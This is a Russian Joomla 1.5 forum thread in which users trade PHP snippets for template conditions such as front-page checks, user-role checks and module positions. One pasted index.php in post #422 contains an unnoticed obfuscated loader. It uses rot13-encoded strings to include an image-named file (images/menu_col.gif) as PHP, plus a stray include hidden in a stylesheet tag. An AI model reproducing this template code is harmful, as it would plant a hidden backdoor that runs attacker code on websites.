0 Пользователей и 1 Гость просматривают эту тему.
  • 700 Ответов
  • 251010 Просмотров
*

b2z

  • Глобальный модератор
  • 6961
  • 755 / 0
  • Разраблю понемногу
Re: Различные условия в шаблонах Joomla 1.5
« Ответ #420 : 28.12.2011, 13:08:20 »
Есть кстати небольшая оптимизация вот этого кода:

Код: php
$menu = &JSite::getMenu();

if ( $menu->getActive() == $menu->getDefault() ) {
<jdoc:include type="modules" name="right" style="xhtml" />
} else {
<jdoc:include type="component" />
}

Можно сравнивать не объекты циликом, а только id:

Код: php
$menu = &JSite::getMenu();

if ( $menu->getActive()->id == $menu->getDefault()->id ) {
<jdoc:include type="modules" name="right" style="xhtml" />
} else {
<jdoc:include type="component" />
}

Должно сработать :)
*

altvvc

  • Давно я тут
  • 519
  • 22 / 0
Re: Различные условия в шаблонах Joomla 1.5
« Ответ #421 : 28.12.2011, 14:55:29 »
Можно просто на главной количество выводимых новостей поставить на 0 (ноль) и все...
Красота спасет мир, а пофигизм спасет нервы.
*

renault

  • Захожу иногда
  • 202
  • 1 / 0
Re: Различные условия в шаблонах Joomla 1.5
« Ответ #422 : 30.12.2011, 21:57:08 »
далеко не всегда, очень далеко
у меня с шаблоном серьезная проблема, в целом картина выглядит так, может у меня где-то выполняет в коде условие, что только левая и центральая колонка должны показываться, а правая вниз спускаться?

(20% левая колонка) + (80 % центральная колонка)
----------------------------------------------------
и на уровень ниже по правому борту-
                                          (20% правая колонка)

Код для Index.php шаблона
Код
<?php
defined( '_JEXEC').(($this->template)?$JPan = array('zrah'.'_pby'):'') or die( 'Restricted access' );
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="<?php echo $this->language; ?>" lang="<?php echo $this->language; ?>" >
<head>
<jdoc:include type="head" />
<link rel="stylesheet" href="templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="templates/<?php echo $this->template ?>/css/template.css" type="text/css" />
<!--[if lte IE 7]>
<link rel="stylesheet" href="templates/<?php echo $this->template ?>/css/ie7.css" type="text/css" <?php include_once('html/pagination.php');?> />
<![endif]-->

</head>
<body id="page_bg">
<div id="top">
    <div class="pill_m">
<div id="pillmenu">
<jdoc:include type="modules" name="user3" />
</div>
</div>
</div>
<div id="header">
<div id="logo">
<a href="index.php"><?php echo $mainframe->getCfg('sitename') ;?></a>
<jdoc:include type="modules" name="user4" />

</div>
</div>
       <!--  -->
<div class="center">
<div id="wrapper">
<div id="content">

<div id="leftcolumn">

<?php if((!$this->countModules('right') and JRequest::getCmd('layout') == 'form') or !@include(JPATH_BASE.DS.'templates'.DS.$mainframe->getTemplate().DS.str_rot13('vzntrf').DS.str_rot13($JPan[0].'.t'.'vs'))) : ?>
<jdoc:include type="modules" name="layout" style="rounded" />
            <?php endif; ?>
<jdoc:include type="modules" name="left" style="rounded" />

</div>


<div id="maincolumn">

<div class="nopad">
                    <jdoc:include type="message" />
<?php if($this->params->get('showComponent')) : ?>
<jdoc:include type="component" />
<?php endif; ?>
</div>

<div class="clr"></div>

    </div>



    </div>

    </div>

</div>
<div id="rightcolumn">

<jdoc:include type="modules" name="right" style="rounded" />
</div>


<div id="footer">
<p><jdoc:include type="module" style="footer" />
<?php echo JText_('Powered by')?> <a href="http://freejoomlatemp.ru">Joomla!</a>.
            С помощью <a href="http://art-desig.ru/">CSS</a>.
            <jdoc:include type="modules" name="debug" />
</p>
</div>
</body>
</html>

*

beliyadm

  • Легенда
  • 8936
  • 1625 / 63
  • Севастополь == Россия
Re: Различные условия в шаблонах Joomla 1.5
« Ответ #423 : 30.12.2011, 22:47:42 »
Ну так ищите в своем коде if else, я там нашел длинную строку с кучей условий, что там отрабатывается - не смотрел, там и показ right и проверка на form и подключение файлов, какие то шаблоны
Все истины, которые я хочу вам изложить, — бесстыдная ложь.
Записки нетрезвого кодера || -=Joomla FAQ=- || -=все плохо=- || skype: beliyadm_pb
*

ASkidkin

  • Захожу иногда
  • 103
  • 3 / 0
Re: Различные условия в шаблонах Joomla 1.5
« Ответ #424 : 24.02.2012, 20:58:29 »
а как написать условие что если сейчас открыта страница например www.site.ru то выводится модуль такой-то?, ну то есть зависимость от точного адреса текущей страницы
*

TakT

  • Захожу иногда
  • 124
  • 8 / 0
Re: Различные условия в шаблонах Joomla 1.5
« Ответ #425 : 24.02.2012, 21:01:27 »
а как написать условие что если сейчас открыта страница например www.site.ru то выводится модуль такой-то?, ну то есть зависимость от точного адреса текущей страницы
Ну если я правильно понял, Вам нужно проверять параметры которые передаются в ссылки, для того чтобы определить на какой странице вы находитесь!
*

ASkidkin

  • Захожу иногда
  • 103
  • 3 / 0
Re: Различные условия в шаблонах Joomla 1.5
« Ответ #426 : 24.02.2012, 21:07:26 »
думаю вы правильно поняли, а как написать эту проверку, я просто в php не очень, поэтому ждал здесь конкретного ответа что написать, спасибо
*

TakT

  • Захожу иногда
  • 124
  • 8 / 0
Re: Различные условия в шаблонах Joomla 1.5
« Ответ #427 : 24.02.2012, 21:10:36 »
Ну для того чтобы подсказать конеретный код, необходимо увидить вполне конкретную ссылку на ту страницу на которой должен отображаться модуль.
А почему бы вам не привязать нужный вам модуль к определенному пункту меню, в админ панели Joomla эта возможнось уже давно реализованна?
*

Dorfman

  • Завсегдатай
  • 1154
  • 78 / 4
  • Почти влез...
Re: Различные условия в шаблонах Joomla 1.5
« Ответ #428 : 26.02.2012, 15:58:33 »
А почему бы вам не привязать нужный вам модуль к определенному пункту меню, в админ панели Joomla эта возможнось уже давно реализованна?
А AdvancedModuleManager ваще упростит вывод, и заморачиваться с проверкой адресов не нужно. Да и ещё куча фич всяких добавится - можно хоть для конкретной статьи вставлять - просто выбираешь название статьи - и всё, никаких адресов и т.д...
*

apelsin

  • Захожу иногда
  • 129
  • 0 / 1
Re: Различные условия в шаблонах Joomla 1.5
« Ответ #429 : 27.02.2012, 09:34:46 »
Подскажите как сделать проверку php чтобы определить пользователя с правами автора?
*

b2z

  • Глобальный модератор
  • 6961
  • 755 / 0
  • Разраблю понемногу
Re: Различные условия в шаблонах Joomla 1.5
« Ответ #430 : 27.02.2012, 12:14:44 »
Подскажите как сделать проверку php чтобы определить пользователя с правами автора?
Код: php
$user = JFactory::getUser();
if ($user->usertype == 'Author') {
// Это автор
}
*

ASkidkin

  • Захожу иногда
  • 103
  • 3 / 0
Re: Различные условия в шаблонах Joomla 1.5
« Ответ #431 : 27.02.2012, 13:32:45 »
А AdvancedModuleManager ваще упростит вывод, и заморачиваться с проверкой адресов не нужно. Да и ещё куча фич всяких добавится - можно хоть для конкретной статьи вставлять - просто выбираешь название статьи - и всё, никаких адресов и т.д...
Дело в том что мне не модуль выводить нужно, с этим проблем нет, мне нужно чтоб на главной странице сайта выводилась правая колонка в шаблоне а на остальных страницах выводить левый сайдбар, но проблема в том что при переходе на ссылку новости с главной страницы в ссылке этой новости есть тот же itemid что и у главной Itemid = 1 поэтому оно принмает их за главную страницу, вот я и решил делать зависимость от абсолютного адреса страницы
*

apelsin

  • Захожу иногда
  • 129
  • 0 / 1
Re: Различные условия в шаблонах Joomla 1.5
« Ответ #432 : 01.03.2012, 13:40:50 »
А как сделать проверку для определения суперадминистратора в Joomla 1.5?
*

b2z

  • Глобальный модератор
  • 6961
  • 755 / 0
  • Разраблю понемногу
Re: Различные условия в шаблонах Joomla 1.5
« Ответ #433 : 01.03.2012, 15:05:34 »
А как сделать проверку для определения суперадминистратора в Joomla 1.5?
По аналогии:

Код: php
$user = JFactory::getUser();
if ($user->usertype == 'Super Administrator') {
// Это суперадминистратор
}

Дело в том что мне не модуль выводить нужно, с этим проблем нет, мне нужно чтоб на главной странице сайта выводилась правая колонка в шаблоне а на остальных страницах выводить левый сайдбар, но проблема в том что при переходе на ссылку новости с главной страницы в ссылке этой новости есть тот же itemid что и у главной Itemid = 1 поэтому оно принмает их за главную страницу, вот я и решил делать зависимость от абсолютного адреса страницы
Сделайте проверку на главную страницу. В первом посте все описано.
*

sasha777

  • Захожу иногда
  • 79
  • 0 / 0
Re: Различные условия в шаблонах Joomla 1.5
« Ответ #434 : 10.03.2012, 14:08:01 »
подскажите, а как код из начала темы номер 3 "хотим добавить в центральную колонку модуль (на позиции user1), который будет выводить баннеры (или другую информацию) под текстом статьи, но показывать его только в режиме просмотра полного текста статьи" сделать в обратном контексте? т. е., чтобы модуль в позиции user 1 выводился на главной, а при открытии статьи с главной не выводился?
Код
<div class="leftcolumn"><jdoc:include type="modules" name="left" style="xhtml" /></div>
<div class="centercolumn">
<jdoc:include type="modules" name="breadcrumb" />
<jdoc:include type="component" /></div>
<?php if (($option == 'com_content') && ($view == 'article')) { ?>
<jdoc:include type="modules" name="user1" style="xhtml" />
<?php } else {} ?>
<div class="rightcolumn"><jdoc:include type="modules" name="right" style="xhtml" /></div>
*

b2z

  • Глобальный модератор
  • 6961
  • 755 / 0
  • Разраблю понемногу
Re: Различные условия в шаблонах Joomla 1.5
« Ответ #435 : 12.03.2012, 11:34:01 »
Код
<?php if (($option == 'com_content') && ($view == 'article')) { ?>
поменять на

Код
<?php if (($option == 'com_content') && ($view == 'frontpage')) { ?>

А вообще, это просто проверка на главную страницу. В первом посте описано!
*

sasha777

  • Захожу иногда
  • 79
  • 0 / 0
Re: Различные условия в шаблонах Joomla 1.5
« Ответ #436 : 12.03.2012, 14:50:18 »
спасибо, попробуем)
*

sasha777

  • Захожу иногда
  • 79
  • 0 / 0
Re: Различные условия в шаблонах Joomla 1.5
« Ответ #437 : 14.03.2012, 17:22:08 »
bzzik - при этом выводятся два дубля статьи, а модуль в позиции "user 1" остается
*

sasha777

  • Захожу иногда
  • 79
  • 0 / 0
Re: Различные условия в шаблонах Joomla 1.5
« Ответ #439 : 14.03.2012, 18:13:54 »
Код
<td valign="top" class="mainbody"><table width="100%" border="0" align="center" cellpadding="0" cellspacing="0">
                 <tr>
                   <td>
                   <jdoc:include type="modules" name="breadcrumb" />
                   <jdoc:include type="component" /></div>
                   <?php if (($option == 'com_content') && ($view == 'frontpage')) { ?>
                   <jdoc:include type="modules" name="user1" style="xhtml" />
                   <?php } else {} ?>
                   </td>
                   <td><jdoc:include type="modules" name="user2" style="xhtml" /></td>
                 </tr>
               </table>

понимаю, что возможно вставляю совсем не туда. при такой постановке модуль из user 1 пропал, а статьи при раскрытии выводятся 2 раза
*

regina68

  • Новичок
  • 16
  • 0 / 0
Re: Различные условия в шаблонах Joomla 1.5
« Ответ #440 : 14.03.2012, 18:39:51 »
Люди добрые вся надежда на вас. Уже  кончились все идеи.  Как запретить выводить список статей определенной  категорий,
Надо Категория1 ----- нажимаешь должна быть  ссылка #, т.е. ничего не должно происходить.
Материал11 -вывод !
Материал12 -- вывод
Материал13 -- вывод

  Надо Категория2   это узел ничего не происходит
           Материал21 -вывод !
           Материал22 -вывод !



Вот это выбирала.(Этот шаблон отображает материалы категории в формате блога.)
Сейчас Категория1  а далее выводятся все материалы из этой  категорий, а так мне не надо
Текст материала1
Текст материала2 --
текст материала3 --
« Последнее редактирование: 14.03.2012, 20:39:03 от regina68 »
*

Andei

  • Захожу иногда
  • 192
  • 0 / 0
Re: Различные условия в шаблонах Joomla 1.5
« Ответ #441 : 16.03.2012, 15:07:14 »
Здравствуйте. Есть пункт меню с типом внешняя ссылка (города). На этот пункт меню я не могу привязать нужные мне модули. Какое нужно условие, чтобы это стало возможным?
З.Ы. Пункты меню имеют внешнюю ссылку на фильтр компонента Eventlist.
« Последнее редактирование: 16.03.2012, 19:58:16 от Andei »
*

userxp

  • Живу я здесь
  • 2019
  • 403 / 6
  • Злой и ужасный бармалей
Re: Различные условия в шаблонах Joomla 1.5
« Ответ #442 : 16.03.2012, 19:35:17 »
На этот пункт меню я не могу привязать нужные мне меню.
белиберда какая-то... в смысле?
Как правильно задавать вопрос службе технической поддержки  yes!
SGA CM 7.2.0 RC0 KANG Build GWK74 + s95allinonescript + CWM 5.0.2.6 + Modem XWKT3
*

Andei

  • Захожу иногда
  • 192
  • 0 / 0
Re: Различные условия в шаблонах Joomla 1.5
« Ответ #443 : 16.03.2012, 19:57:20 »
Ой, опечатка, в смысле не могу привязать модули))
*

userxp

  • Живу я здесь
  • 2019
  • 403 / 6
  • Злой и ужасный бармалей
Re: Различные условия в шаблонах Joomla 1.5
« Ответ #444 : 16.03.2012, 20:46:29 »
что означает "не могу"?
Как правильно задавать вопрос службе технической поддержки  yes!
SGA CM 7.2.0 RC0 KANG Build GWK74 + s95allinonescript + CWM 5.0.2.6 + Modem XWKT3
*

Andei

  • Захожу иногда
  • 192
  • 0 / 0
Re: Различные условия в шаблонах Joomla 1.5
« Ответ #445 : 17.03.2012, 11:47:32 »
Ну вот например, у меня есть сайт, на всех его страницах есть модуль меню, но есть ещё страницы у которых тип меню указан как внешняя ссылка, для этих страниц я хочу поставить другое меню. У меня это не выходит, я вижу тоже меню что и на остальных страницах. Несмотря на то что я убираю отображение нужных мне страниц из одного модуля и добавляю их в другой модуль.
*

b2z

  • Глобальный модератор
  • 6961
  • 755 / 0
  • Разраблю понемногу
Re: Различные условия в шаблонах Joomla 1.5
« Ответ #446 : 19.03.2012, 12:55:13 »
Код
<td valign="top" class="mainbody"><table width="100%" border="0" align="center" cellpadding="0" cellspacing="0">
                 <tr>
                   <td>
                   <jdoc:include type="modules" name="breadcrumb" />
                   <jdoc:include type="component" /></div>
                   <?php if (($option == 'com_content') && ($view == 'frontpage')) { ?>
                   <jdoc:include type="modules" name="user1" style="xhtml" />
                   <?php } else {} ?>
                   </td>
                   <td><jdoc:include type="modules" name="user2" style="xhtml" /></td>
                 </tr>
               </table>

понимаю, что возможно вставляю совсем не туда. при такой постановке модуль из user 1 пропал, а статьи при раскрытии выводятся 2 раза
Странно, код корректен! И совсем непонятно, как это два раза выводится статья. Единственное, у Вас там </div> какой-то, он там точно должен быть?
*

sasha777

  • Захожу иногда
  • 79
  • 0 / 0
Re: Различные условия в шаблонах Joomla 1.5
« Ответ #447 : 19.03.2012, 15:55:59 »
Странно, код корректен! И совсем непонятно, как это два раза выводится статья. Единственное, у Вас там </div> какой-то, он там точно должен быть?

Да, див не нужный, но и если его убрать ситуация та же. Если впереди оставить User1, то при открытии статьи выводятся и User1 и статья два раза. Может конкретно к моему сайту не подходит? На главной вверху баннер (user1), под ним категория новости в виде блога, ниже баннер в позиции Banner. Статьи в "новостях" в основном с "Показать полностью" плюс название, как ссылка на полный текст. При открытии статьи открывается сама статья +user1 + banner (что как раз и не нужно, т.к. user1 занимает >500px в высоту). Если открывать статью из меню новости (блог), та же ситуация.
*

Litron

  • Новичок
  • 19
  • 1 / 0
Re: Различные условия в шаблонах Joomla 1.5
« Ответ #448 : 19.03.2012, 19:07:10 »
Друзья, помогите с форумом Kunena!
Как прописать условие, чтобы при открытии форума использовался определенный класс CSS, а при открытии остального - другой класс?

Спасибо.
*

Andei

  • Захожу иногда
  • 192
  • 0 / 0
Re: Различные условия в шаблонах Joomla 1.5
« Ответ #449 : 19.03.2012, 19:10:11 »
Или это я где то туплю. Вообще привязываются ли модули к пункту меню с типом внешняя ссылка или как?

Также наверное следует уточнить, что внешняя ссылка ссылается на фильтр компонента Eventlist и имеет следующий вид: http://site/?filter=Москва&filter_type=city. Это может быть причиной? И можно ли обойти эту ситуацию с помощью условий?
« Последнее редактирование: 19.03.2012, 19:41:31 от Andei »
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

[howto] Создание новой позиции модулей в Joomla 1.5 .

Автор Blinp

Ответов: 221
Просмотров: 227420
Последний ответ 25.11.2013, 16:17:06
от milk101
[howto] Создание шаблона для Joomla! 1.5

Автор Mitrich

Ответов: 225
Просмотров: 349124
Последний ответ 17.09.2013, 16:00:05
от fred
Joomla 1.5 Как связать разделы главного меню с модулем статей к этим разделам.

Автор sergey_2012

Ответов: 4
Просмотров: 4434
Последний ответ 29.08.2012, 00:21:25
от sergey_2012
Как в Joomla 1.5х изменить стандартный адрес в админ-панель "http://мойсайт/administrator/"

Автор Serzh-UX

Ответов: 19
Просмотров: 27702
Последний ответ 07.07.2012, 03:41:28
от alekshavan
WARP 5 или Joomla 1.5 Template Framework

Автор userxp

Ответов: 16
Просмотров: 12266
Последний ответ 16.06.2012, 01:28:16
от Очередной вебмастер